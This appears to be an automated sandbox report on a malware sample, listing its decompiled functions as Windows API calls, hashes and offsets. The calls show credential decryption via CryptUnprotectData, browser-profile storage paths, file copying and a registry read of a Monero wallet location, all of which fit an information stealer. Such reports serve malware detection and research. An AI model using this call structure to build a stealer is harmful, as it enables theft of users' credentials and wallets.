                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A7765
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000A778D
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 000A77AD
                                    • LocalFree.KERNEL32(?), ref: 000A77B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: e839849d1012413a2eb18f11e7b8cfb85d644b2ec2a19fcbb54a3e2410be08ce
                                    • Instruction ID: c36f23ad9f6ebc183aedd53b7bed4ebbf14f3244ff8a2b391d8540806c781434
                                    • Opcode Fuzzy Hash: e839849d1012413a2eb18f11e7b8cfb85d644b2ec2a19fcbb54a3e2410be08ce
                                    • Instruction Fuzzy Hash: 49011E75B41318BBEB10DB94EC4AFAA7B78EB44B11F104159FA09EA2C0D6B0AD40CB90
                                    APIs
                                      • Part of subcall function 000C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 000C71FE
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C3A96
                                    • Process32First.KERNEL32(00000000,00000128), ref: 000C3AA9
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 000C3ABF
                                      • Part of subcall function 000C7310: lstrlen.KERNEL32(------,000A5BEB), ref: 000C731B
                                      • Part of subcall function 000C7310: lstrcpy.KERNEL32(00000000), ref: 000C733F
                                      • Part of subcall function 000C7310: lstrcat.KERNEL32(?,------), ref: 000C7349
                                      • Part of subcall function 000C7280: lstrcpy.KERNEL32(00000000), ref: 000C72AE
                                    • CloseHandle.KERNEL32(00000000), ref: 000C3BF7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 57c8708e02c6bed025c6804ddcaee43fc4e57247ccd80ded0c1bf450383ab6e9
                                    • Instruction ID: a0381d572573cc6f8d06b06f134f9d25e430f907833dbc3b5c0ae34c7a2ee4de
                                    • Opcode Fuzzy Hash: 57c8708e02c6bed025c6804ddcaee43fc4e57247ccd80ded0c1bf450383ab6e9
                                    • Instruction Fuzzy Hash: 0581DF30915215CFC764CF18D988B99B7E1BB45329F29C1AEE4089B2A2D7769D82CF80
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 000AEA76
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 000AEA7E
                                    • lstrcat.KERNEL32(000CCFEC,000CCFEC), ref: 000AEB27
                                    • lstrcat.KERNEL32(000CCFEC,000CCFEC), ref: 000AEB49
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 6fe457633d1cf4b36d320925619635b4f0001f3682331504810f80e1464314b3
                                    • Instruction ID: db73dcd7fff4482b7c5d6bfc67240444c099cbd2cf2602d723374c755279487d
                                    • Opcode Fuzzy Hash: 6fe457633d1cf4b36d320925619635b4f0001f3682331504810f80e1464314b3
                                    • Instruction Fuzzy Hash: CC31C175E11219ABDB109B98EC49FEFB7799B44705F04417AFA09E7280DBB05A048BA1
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 000C40CD
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 000C40DC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C40E3
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 000C4113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                    • String ID:
                                    • API String ID: 3825993179-0
                                    • Opcode ID: 1e5d2a8c0925944718bdef6c36cd0942e599f50b7cad62e57a0a7cfd8c7078a0
                                    • Instruction ID: cbb0ee7abdbffb239eced40bcf09a5ca93c66e3eb9d29a62f2d574b14cd7f412
                                    • Opcode Fuzzy Hash: 1e5d2a8c0925944718bdef6c36cd0942e599f50b7cad62e57a0a7cfd8c7078a0
                                    • Instruction Fuzzy Hash: 2A011A70A01205BBDB109FA5EC99FAABBADEF85311F108159BE0987240DA719D40CBA4
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000A9B3B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000A9B4A
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000A9B61
                                    • LocalFree.KERNEL32 ref: 000A9B70
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: f5cf04dc6f3f3a7108866edd13ca58d52a0560109c7e921021977e9ea992771d
                                    • Instruction ID: c725b93e3a8e45b763f75b7695d574ad3c636c73b48c969d33f1c175c0043550
                                    • Opcode Fuzzy Hash: f5cf04dc6f3f3a7108866edd13ca58d52a0560109c7e921021977e9ea992771d
                                    • Instruction Fuzzy Hash: 8EF01D707523226BE7701FA4BC49F567BA8EF45B51F200115FA49EA2D0D7B09C80CAA4
                                    APIs
                                    • CoCreateInstance.COMBASE(000CB110,00000000,00000001,000CB100,?), ref: 000BCB06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 000BCB46
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 000BCBC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                    • String ID:
                                    • API String ID: 1940255200-0
                                    • Opcode ID: c1faa9b6a5485bd8d7f63eacc5d00a0361a1e3136b0bad0d0079b820dddc0a65
                                    • Instruction ID: 7446ac0dbd930711560108ac493f45f27d9e5ff5d458360bef79fa56e19b336d
                                    • Opcode Fuzzy Hash: c1faa9b6a5485bd8d7f63eacc5d00a0361a1e3136b0bad0d0079b820dddc0a65
                                    • Instruction Fuzzy Hash: 5D311271A40615AFD710DB98CC96FAEB7B9DB88B10F104194FA14EB2D0D7B1AE45CB90
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 000A9B9F
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 000A9BB3
                                    • LocalFree.KERNEL32(?), ref: 000A9BD7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 4a12269f165fdba68d193f2a94574ab47607d3352cefa56790f0da780bb991a1
                                    • Instruction ID: 42f4d5ad108aedd371dcdefacb427fec975087058be02f85261d3eb6f03c7ebe
                                    • Opcode Fuzzy Hash: 4a12269f165fdba68d193f2a94574ab47607d3352cefa56790f0da780bb991a1
                                    • Instruction Fuzzy Hash: 8E011275E41309ABD7109BA4DC49FAEB778EB44701F104555FA04AB284DB749D00C7E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: C3{5$Xh[
                                    • API String ID: 0-2274618491
                                    • Opcode ID: a60416b84ca526d4662d0d5d2eecf8a1ddded4a15d87a0e5fb37e8ba2ad18c2b
                                    • Instruction ID: 416eae0791622bd5a1941b2a3d50340eeb7ee04d8e429e7a1b30c6bdcc2a39eb
                                    • Opcode Fuzzy Hash: a60416b84ca526d4662d0d5d2eecf8a1ddded4a15d87a0e5fb37e8ba2ad18c2b
                                    • Instruction Fuzzy Hash: B571F5F361C2049FE7016E2EEC8576ABBE9EFD8620F16453DE6C4C3744EA3158058693
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,l;
                                    • API String ID: 0-1649111933
                                    • Opcode ID: 7fec594b06542c4ecef346af88dc62cd7f040957f92a7ff95029411f7ab398c0
                                    • Instruction ID: 0809757dd1d21d220b9e7bb9d120c93435ad22d99d7f76d11f98a0b01c4329ca
                                    • Opcode Fuzzy Hash: 7fec594b06542c4ecef346af88dc62cd7f040957f92a7ff95029411f7ab398c0
                                    • Instruction Fuzzy Hash: 240219F3A082149FE7146E1DDC8577ABBE9EF94320F16493DEAC8C3744EA3598048796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: g>$+
                                    • API String ID: 0-4095000794
                                    • Opcode ID: 5e5471d2bb1a524a625734bfeb1123b26802e0c903c88f10000002a9fbf6a317
                                    • Instruction ID: 051539becc884904cef01c7fabd4c992f3a0e61ce53d5112c392d6dc22001c90
                                    • Opcode Fuzzy Hash: 5e5471d2bb1a524a625734bfeb1123b26802e0c903c88f10000002a9fbf6a317
                                    • Instruction Fuzzy Hash: 1451DEF29086049BE300BE29DC4572AF7E5EFA4710F1A893CDAD583340FA35A9558A87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Aq2X
                                    • API String ID: 0-3743379348
                                    • Opcode ID: 6c6ec8a6f1a4b58032ebc1141158ab66b79ae822410c5a1aa824d9be094b0716
                                    • Instruction ID: 66fff6dbbf17736bbef3540a7ea7b346ec91f692c78f6a9494acd9241ef4dee2
                                    • Opcode Fuzzy Hash: 6c6ec8a6f1a4b58032ebc1141158ab66b79ae822410c5a1aa824d9be094b0716
                                    • Instruction Fuzzy Hash: 1031F2F3E045105BF7089929ED9973676DADBE0720F2A423E9B59973C0E87D8C054298
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b744acc1101288928b3875652bdcb85eb266c492b6192fcf7b88b1526c6ed8ef
                                    • Instruction ID: 297b112dd43d8a0374f5b65012923a7f1e60df4d931ec0b960354eec72af31e7
                                    • Opcode Fuzzy Hash: b744acc1101288928b3875652bdcb85eb266c492b6192fcf7b88b1526c6ed8ef
                                    • Instruction Fuzzy Hash: 1F414CF390C3189BD3046E2CEDC5767FBDAEBA4220F29463DDA8593740EA3669058587
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 56ea656ae946bc8b4034e1b00e52360752974252a0f104aa8270906663db70f7
                                    • Instruction ID: d75dc04e3efec79023392154e63bc754e9353e66d83e4f63c752886867d10b78
                                    • Opcode Fuzzy Hash: 56ea656ae946bc8b4034e1b00e52360752974252a0f104aa8270906663db70f7
                                    • Instruction Fuzzy Hash: 6E3168F321C606DFE305593DED55B7EBB9ABBD4720F3A8B2DA282C2BD8E53448015512
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5390f5c9042800698c0535362c7f6d3465c31678d6ea2534759f51ae2b5a8287
                                    • Instruction ID: 62352029ef0d8765d7cf7488b6bcbd9978d12b4295f898e21c6cd4c9c890feea
                                    • Opcode Fuzzy Hash: 5390f5c9042800698c0535362c7f6d3465c31678d6ea2534759f51ae2b5a8287
                                    • Instruction Fuzzy Hash: 0F21F6F3D185104FF3545D39DC4A72BB6D65B60720F2B463DDE84D7BC0E97899018686
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27abeee1ef2fb7ff0398b536df204f429a76b0884c1f13dc95d243422c287789
                                    • Instruction ID: ad11c9497f54e2bae8fe91cba16917c89f68db5731d7bced1d0c63a43f7b9b48
                                    • Opcode Fuzzy Hash: 27abeee1ef2fb7ff0398b536df204f429a76b0884c1f13dc95d243422c287789
                                    • Instruction Fuzzy Hash: D63101B210C704DFD7467F29D88266EFBE0EF68350F16482CD2D582610E7399484CB4B
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B8636
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B866D
                                    • lstrcpy.KERNEL32(?,00000000), ref: 000B86AA
                                    • StrStrA.SHLWAPI(?,00E6DD20), ref: 000B86CF
                                    • lstrcpyn.KERNEL32(002D93D0,?,00000000), ref: 000B86EE
                                    • lstrlen.KERNEL32(?), ref: 000B8701
                                    • wsprintfA.USER32 ref: 000B8711
                                    • lstrcpy.KERNEL32(?,?), ref: 000B8727
                                    • StrStrA.SHLWAPI(?,00E6E008), ref: 000B8754
                                    • lstrcpy.KERNEL32(?,002D93D0), ref: 000B87B4
                                    • StrStrA.SHLWAPI(?,00E6E0C8), ref: 000B87E1
                                    • lstrcpyn.KERNEL32(002D93D0,?,00000000), ref: 000B8800
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                    • String ID: $%s%s$8
                                    • API String ID: 2672039231-1131050817
                                    • Opcode ID: eccec927b314552ca804fb56dd843c5cde405668776607d32b6b1622ba478afc
                                    • Instruction ID: cbefdda87e703ca2e60931d3c9b75734e76af4b8144dede1fe4859a4409bbd8d
                                    • Opcode Fuzzy Hash: eccec927b314552ca804fb56dd843c5cde405668776607d32b6b1622ba478afc
                                    • Instruction Fuzzy Hash: 1AF15D71D05114EFDB50DB68ED4CAEAB7B9EF48300F14859AF909E7261DB70AE41CBA0
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A1F9F
                                    • lstrlen.KERNEL32(00E68980), ref: 000A1FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A1FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A1FE3
                                    • lstrlen.KERNEL32(000D1794), ref: 000A1FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A200E
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A2042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A204D
                                    • lstrlen.KERNEL32(000D1794), ref: 000A2058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2075
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A2081
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A20AC
                                    • lstrlen.KERNEL32(?), ref: 000A20E4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2104
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A2112
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2139
                                    • lstrlen.KERNEL32(000D1794), ref: 000A214B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A216B
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000A2177
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A219D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A21A8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A21D4
                                    • lstrlen.KERNEL32(?), ref: 000A21EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A220A
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A2218
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2242
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A227F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000A228D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A22B1
                                    • lstrcat.KERNEL32(00000000,00E6CDB8), ref: 000A22B9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A22F7
                                    • lstrcat.KERNEL32(00000000), ref: 000A2304
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A232D
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000A2356
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A2382
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000A23BF
                                    • DeleteFileA.KERNEL32(00000000), ref: 000A23F7
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000A2444
                                    • FindClose.KERNEL32(00000000), ref: 000A2453
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
• Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                    • String ID:
                                    • API String ID: 2857443207-0
                                    • Opcode ID: d0e817e6c20bc263c58d065ac31f6a9bc00458c41ddcb9c8fe9a867a171bc90e
                                    • Instruction ID: 0bbf74c85154d9d52ebc4c44cbae24ef1e89d819e32f3a9555693b4bf5f6ffe6
                                    • Opcode Fuzzy Hash: d0e817e6c20bc263c58d065ac31f6a9bc00458c41ddcb9c8fe9a867a171bc90e
                                    • Instruction Fuzzy Hash: B6E14F31A112169FCB21EFE8ED89AEE77F9AF16300F044035F905A7622DB34DD458BA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6445
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6480
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000B64AA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B64E1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6506
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B650E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6537
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FolderPathlstrcat
                                    • String ID: \..\
                                    • API String ID: 2938889746-4220915743
                                    • Opcode ID: 8be8abb71926c3e30d4574938ec041b0e74223dae07bf31495226c79b61f619a
                                    • Instruction ID: 173f831de2640e4a4d20a60ce39b38ef4c53ad3a0523fdaaf5f11da2e1b522a8
                                    • Opcode Fuzzy Hash: 8be8abb71926c3e30d4574938ec041b0e74223dae07bf31495226c79b61f619a
                                    • Instruction Fuzzy Hash: DDF19D70E116169BDB61EFA8D849AEE77F4AF05300F044139F859DB262EB39DC41CB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B43A3
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B43D6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B43FE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4409
                                    • lstrlen.KERNEL32(\storage\default\), ref: 000B4414
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4431
                                    • lstrcat.KERNEL32(00000000,\storage\default\), ref: 000B443D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4466
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4471
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4498
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B44D7
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B44DF
                                    • lstrlen.KERNEL32(000D1794), ref: 000B44EA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4507
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B4513
                                    • lstrlen.KERNEL32(.metadata-v2), ref: 000B451E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B453B
                                    • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 000B4547
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B456E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B45A0
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000B45A7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4601
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B462A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B4653
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B467B
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B46AF
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                    • String ID: .metadata-v2$\storage\default\
                                    • API String ID: 1033685851-762053450
                                    • Opcode ID: cd1cac6b5e01a003d705691a576bbcede8ba967ed23843524902acdd663ab07c
                                    • Instruction ID: 416f3d2b5cbf90985c794db13200070a7b7d1e8d30c49d4b003dbc1ffbdaeeb8
                                    • Opcode Fuzzy Hash: cd1cac6b5e01a003d705691a576bbcede8ba967ed23843524902acdd663ab07c
                                    • Instruction Fuzzy Hash: 39B16C31A116169BDB21EFB8E949AEF77E8AF11700F040139F845E7663EB34DE418B91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B57D5
                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 000B5804
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5835
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B585D
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B5868
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5890
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B58C8
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B58D3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B58F8
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B592E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5956
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B5961
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5988
                                    • lstrlen.KERNEL32(000D1794), ref: 000B599A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B59B9
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B59C5
                                    • lstrlen.KERNEL32(00E6CDE8), ref: 000B59D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B59F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B5A02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5A2C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5A58
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000B5A5F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5AB7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5B2D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5B56
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5B89
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5BB5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B5BEF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B5C4C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B5C70
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 2428362635-0
                                    • Opcode ID: 3f648ed41aae5c7a493e17ec5593900617f73d110db08d5befdaf2cd7128ac3c
                                    • Instruction ID: 7cf5202d6813ac0c7b50e8c13825ec9c7ad4a2f11faa503ceba9711db99dd0f9
                                    • Opcode Fuzzy Hash: 3f648ed41aae5c7a493e17ec5593900617f73d110db08d5befdaf2cd7128ac3c
                                    • Instruction Fuzzy Hash: 6602CE70E016159FCB21EFA8DC89AEE7BF9AF04301F044179F849A7252DB30DC418B91
                                    APIs
                                      • Part of subcall function 000A1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000A1135
                                      • Part of subcall function 000A1120: RtlAllocateHeap.NTDLL(00000000), ref: 000A113C
                                      • Part of subcall function 000A1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 000A1159
                                      • Part of subcall function 000A1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 000A1173
                                      • Part of subcall function 000A1120: RegCloseKey.ADVAPI32(?), ref: 000A117D
                                    • lstrcat.KERNEL32(?,00000000), ref: 000A11C0
                                    • lstrlen.KERNEL32(?), ref: 000A11CD
